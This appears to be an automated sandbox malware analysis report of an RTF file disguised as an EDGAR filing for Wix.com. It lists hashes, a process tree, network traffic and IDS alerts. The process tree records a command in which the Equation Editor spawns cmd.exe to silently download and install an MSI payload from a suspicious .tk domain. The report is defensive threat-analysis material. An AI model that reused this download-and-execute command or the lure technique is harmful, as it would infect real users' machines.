File name: | fb6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af |
Full analysis: | https://app.any.run/tasks/79af0a5d-f4ce-405e-af03-59f47bed01d2 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 12:12:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | 75100A10AAB352C87254756FD1083243 |
SHA1: | 94F4B3BA8E03A1814B00933D8EB7012575E7343D |
SHA256: | FB6C0B45778647CFF26079CFB5D941E5A1748951C16B743FE3E027D4331B14AF |
SSDEEP: | 384:WffMRZU5kpjXbd6Yrpwp5KSy2etruVdp3CHx42pQ0lvo/:WfcZskpjXb7iY2cGPCHmwVZo/ |
.rtf | | | Rich Text Format (100) |
---|
Subject: | EDGAR Online Pro |
---|---|
RevisionNumber: | 3 |
Company: | EDGAR Online, Inc. |
Author: | EDGAR Online HTML to RTF Converter. Version 3.0 |
Category: | 0001178913-18-000525.html.ecq |
Comments: | Source: EDGAR Online, Inc. © Copyright 2018. All rights reserved. |
Title: | Wix.com Ltd. (Form: 6-K, Received: 02/14/2018 06:28:27) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\fb6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3112 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2140 | cmd.exe & /C CD C: & msiexec.exe /i http://lhtcom-sg.tk/love/cuck.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
836 | msiexec.exe /i http://lhtcom-sg.tk/love/cuck.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3680 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2484 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F5E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F256365BB40E1ED143331852C8180F1C | SHA256:4EFC9EA85F203F5D2F25E4E694BD5FE976613FB15D1AB7D520BF29E0D2F4CFDA | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af.rtf | pgc | |
MD5:665992045C86C763E67175AEE8083E62 | SHA256:66E129E2F2D102965FF11BC39211F0CD342F5CE776D4EC3C6D6188F0A33A4C1F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3680 | msiexec.exe | GET | — | 195.248.234.34:80 | http://lhtcom-sg.tk/love/cuck.msi | UA | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3680 | msiexec.exe | 195.248.234.34:80 | lhtcom-sg.tk | ON-LINE Ltd | UA | suspicious |
Domain | IP | Reputation |
---|---|---|
lhtcom-sg.tk |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3680 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |
3680 | msiexec.exe | Potentially Bad Traffic | ET POLICY HTTP Request to a *.tk domain |